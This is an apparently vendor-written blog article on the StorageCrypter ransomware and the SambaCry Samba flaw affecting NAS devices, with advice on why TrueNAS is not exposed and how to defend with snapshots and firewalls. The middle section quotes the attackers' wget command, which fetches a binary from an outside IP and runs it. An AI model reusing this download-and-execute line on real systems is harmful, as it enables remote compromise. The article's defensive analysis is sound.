The StorageCrypter Ransomware appears to be targeting NAS systems around the world but the facts surrounding it have been somewhat confusing. Let’s look at why your TrueNAS and TrueNAS Core systems are not vulnerable to this specific attack and how to further protect yourself from this category of attacks.
Hats off to the most buzzword-loaded headline of the year: “StorageCrypt Ransomware Infecting NAS Devices Using SambaCry”. You shouldn’t have much trouble finding the article or the dozens of reproductions of it but you may have trouble determining exactly what the real-world risks of the “StorageCrypt” ransomware are and if they can impact you as a TrueNAS Core or TrueNAS user. The various articles suggest that “StorageCrypt” is:
- Linux ransomware that executes on a storage system
- Windows ransomware that executes on a connected client
- Cryptocurrency mining software
- An encryption product for Windows
- Also known as StorageCrypter
First off, the “StorageCrypt” ransomware does not appear to have anything to do with the StorageCrypt encryption software found at storagecrypt.com. This naming collision appears to be the result of sloppy journalism and “StorageCrypt ransomware” now wins the search battle against the more-correct “StorageCrypter ransomware”. I will use “StorageCrypter” going forward out of respect for the StorageCrypt authors.
From there, I cannot help but notice that every website relating to “StorageCrypter” is more or less part of Windows-oriented advertising networks for antivirus/anti-ransomware tools, articles, and tutorials, many of which blur the line between the “download” links of articles and “Download NOW!” advertisements. I consider this approach irresponsible given how many of these links are clickbait for what may, in turn, be mildly-malicious adware and spyware. I do however appreciate the clear reminder of why I have never run Microsoft Windows.
What we know about StorageCrypter
The known StorageCrypter victims are finding their files renamed with the “
.locked” extension and a ransom note entitled “
_READ_ME_FOR_DECRYPT.txt” containing information on what has happened and how to get the files back. Some users also see a Windows executable named “
美女与野兽.exe” which translates to “The Beauty and the Beast”, accompanied by an
Autorun.inf to launch it. Two reported vulnerable NAS systems are the Thecus 7710G NAS and the Western Digital MyCloud EX4100, the first of which is Intel-based and the second ARM-based, both running GNU/Linux. Both Thecus and Western Digital have issued software updates to address the issue, as have Cisco, NETGEAR, QNAP and Synology, Veritas and NetApp as a precaution.
As for how these systems were attacked, at least one user confessed, “I exposed my WD MyCloud to the internet via port forwarding on my router”. Doing this is indeed a plausible vector for the “SambaCry” vulnerability to take advantage of the Samba SMB service version 3.5.0 through versions 4.6.4, 4.5.10 and 4.4.14. “SambaCry”, or more accurately CVE-2017-7494, allows a carefully-crafted Samba shared library to be injected over network port 445 provided that the attacker can guess the path to a writable share. If these required criteria are met and the shared library is executed by Samba, the attacker can execute shell commands on the target system with the permissions of the
smbd process. In the case of StorageCrypter, those commands appear to be ‘
wget -O /tmp/apaceha http://126.96.36.199/sambacry && chmod -x /tmp/apaceha &&nohub /tmp/apaceha >/dev/null 2>&1 &’ which downloads and executes a binary named “
sambacry” that is renamed to “
apaceha”. According to one source, this payload is a downloader of other payloads that could be as simple as the “
美女与野兽.exe” landmine for Windows users to step on but this has not been confirmed. Running the program would execute the ransomware on the connected Windows system, encrypting all accessible files on the NAS system and possibly other locations such as local disks.
What does this mean for TrueNAS Core users?
FreeNAS systems later than 9.10.2-U4 are not vulnerable to SambaCry. In addition, unlike the commodity NAS systems described above, TrueNAS Core:
- Does not run GNU/Linux, significantly reducing its attack surface
- Does not have any default SMB sharing paths, slowing an attack
- Could mitigate the ransomware aspect of the attack with OpenZFS snapshots
- Should, as with any NAS, never be exposed to the Internet in the first place
Just as with any ransomware attack that directly targets network shares, OpenZFS snapshots in TrueNAS Core and TrueNAS are a proven means of quickly recovering from the damage done by the attack and avoiding payment of a ransom. Unfortunately, the StorageCrypter attack marks a shift from ransomware relying on users falling for attractive phishing bait to automated attacks that exploit software vulnerabilities. Attackers have not yet set their sights on OpenZFS snapshots when launching ransomware attacks but you should start protecting yourself in case they do:
- Never expose your TrueNAS Core or TrueNAS storage system to the open Internet like the 350,000 Samba users who are at this very moment!
- If you need to grant remote access to your system for administrative reasons such as remote replication, do so using a combination of a GeoIP-aware firewall and a Virtual Private Network
- Set the “
exec=off” OpenZFS property on your shares to prevent malware execution
Reprinted with permission from iXsystems.